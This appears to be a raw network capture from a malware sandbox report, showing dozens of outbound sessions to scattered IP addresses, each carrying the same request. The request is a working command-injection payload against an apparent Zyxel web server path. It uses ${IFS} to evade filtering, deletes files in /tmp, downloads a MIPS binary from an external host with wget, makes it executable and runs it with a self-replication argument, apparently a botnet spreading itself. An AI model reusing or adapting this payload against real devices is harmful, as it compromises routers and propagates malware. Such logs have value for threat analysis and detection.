                                                        Jan 28, 2024 10:12:36.093415022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        506192.168.2.1460876195.168.63.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093451977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        507192.168.2.144141289.83.45.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093487978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        508192.168.2.144168896.30.76.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093512058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        509192.168.2.1454030220.9.59.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093555927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        510192.168.2.1442372198.41.90.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093585968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        511192.168.2.1460112128.133.156.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093619108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        512192.168.2.1457832170.63.234.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093648911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        513192.168.2.144936438.174.251.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093693018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        514192.168.2.145719295.19.210.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093743086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        515192.168.2.144666213.138.157.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093770027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        516192.168.2.1449896136.219.77.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093801975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        517192.168.2.1436338176.103.10.163443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093898058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        518192.168.2.1459644223.183.125.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093924999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        519192.168.2.144428083.247.42.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.093954086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        520192.168.2.1459396161.128.90.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094017029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        521192.168.2.143663883.20.86.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094036102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        522192.168.2.1440416122.251.18.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094038010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        523192.168.2.1446530116.196.57.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094072104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        524192.168.2.143412454.222.51.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094126940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        525192.168.2.1432832101.88.249.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094171047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        526192.168.2.144811219.139.247.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094208956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        527192.168.2.145905442.231.240.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094230890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        528192.168.2.1442778141.68.97.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094261885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        529192.168.2.143904291.12.103.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094293118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        530192.168.2.1449110167.141.153.214443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094338894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        531192.168.2.145624436.255.229.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094389915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        532192.168.2.144012659.233.87.162443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094435930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        533192.168.2.1454114189.231.244.117443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094460011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        534192.168.2.144724812.71.64.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094481945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        535192.168.2.144326019.223.33.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094513893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        536192.168.2.145084258.50.203.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094564915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        537192.168.2.1454722122.162.41.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094615936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        538192.168.2.144759819.126.181.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094659090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        539192.168.2.1448056167.127.61.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094675064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        540192.168.2.1460550212.95.68.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094724894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        541192.168.2.1439056146.0.128.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094769955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        542192.168.2.1452706202.102.163.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094825029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        543192.168.2.143674895.211.90.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094825029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        544192.168.2.144356417.93.109.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094856024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        545192.168.2.1454402205.37.220.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094882011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        546192.168.2.143403466.139.208.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094933033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        547192.168.2.143318268.235.75.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.094981909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        548192.168.2.1459206203.171.169.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095012903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        549192.168.2.1436136103.244.249.20443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095027924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        550192.168.2.1445868186.122.103.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095077991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        551192.168.2.1453258204.189.232.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095122099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        552192.168.2.1446866172.56.166.237443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095171928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        553192.168.2.1460882171.168.68.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095199108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        554192.168.2.1459964200.179.19.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095227957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        555192.168.2.144439064.16.168.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095282078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        556192.168.2.1441844136.161.229.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095313072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        557192.168.2.1449542152.191.156.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095340967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        558192.168.2.1452224134.191.154.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095374107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        559192.168.2.145265484.109.236.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095417023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        560192.168.2.1460948173.52.216.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095468998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        561192.168.2.144515886.178.38.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095498085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        562192.168.2.144448094.230.23.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095535040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        563192.168.2.1452518103.218.25.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095555067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        564192.168.2.144498690.41.111.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095617056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        565192.168.2.144256263.172.70.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095647097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        566192.168.2.1448740124.125.240.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:36.095710039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
